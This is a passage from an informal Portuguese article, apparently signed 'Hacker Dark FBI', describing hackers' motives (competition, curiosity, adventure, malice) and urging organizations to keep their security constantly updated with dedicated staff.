competição, ou uma verdadeira "gincana" na sua empresa. Dentro de grupos, é
constante a necessidade de mostrar sua superioridade. Este é um fato natural,
seja entre humanos, animais selvagens ou hackers...

Curiosidade e Aprendizado: Muitos hackers alegam invadir sistemas apenas
para aprender como eles funcionam. Alguns fazem questão de testar o esquema
de segurança, buscando brechas e aprendendo sobre novos mecanismos. Este
tipo de ataque raramente causa um dano maior ou compromete os serviços
atacados.

Busca de Aventuras: O ataque a sistemas importantes, onde os esquemas de
segurança são muito avançados, podem fazer com que o hacker se sinta
motivado pelo desafio e pelo perigo de ser pego, assim como alpinistas sobem
montanhas, mesmo sabendo do risco de caírem.

Maldade: Algumas pessoas sentem prazer na destruição. Invadem e destroem,
pelo puro prazer de causar o mal. Raramente são pegos e se vangloriam dos seu
atos.

Seja o hacker quem for e faça ele o que fizer, é importante que ele seja
neutralizado, pelo menos temporariamente, até que seu esquema de segurança
seja revisto e atualizado.

Essa atualização precisa ser constante, pois os hackers estão na "crista da onda"
no que diz respeito a falhas de segurança e, muitas vezes, eles não fazem nada
além de invadir sistemas. É extremamente necessário que haja alguém dedicado a
este assunto, pelo menos o mesmo tempo gasto por dia pelos hackers nas
tentativas de invasão.

By Hacker Dark FBI <-Evolução Hacker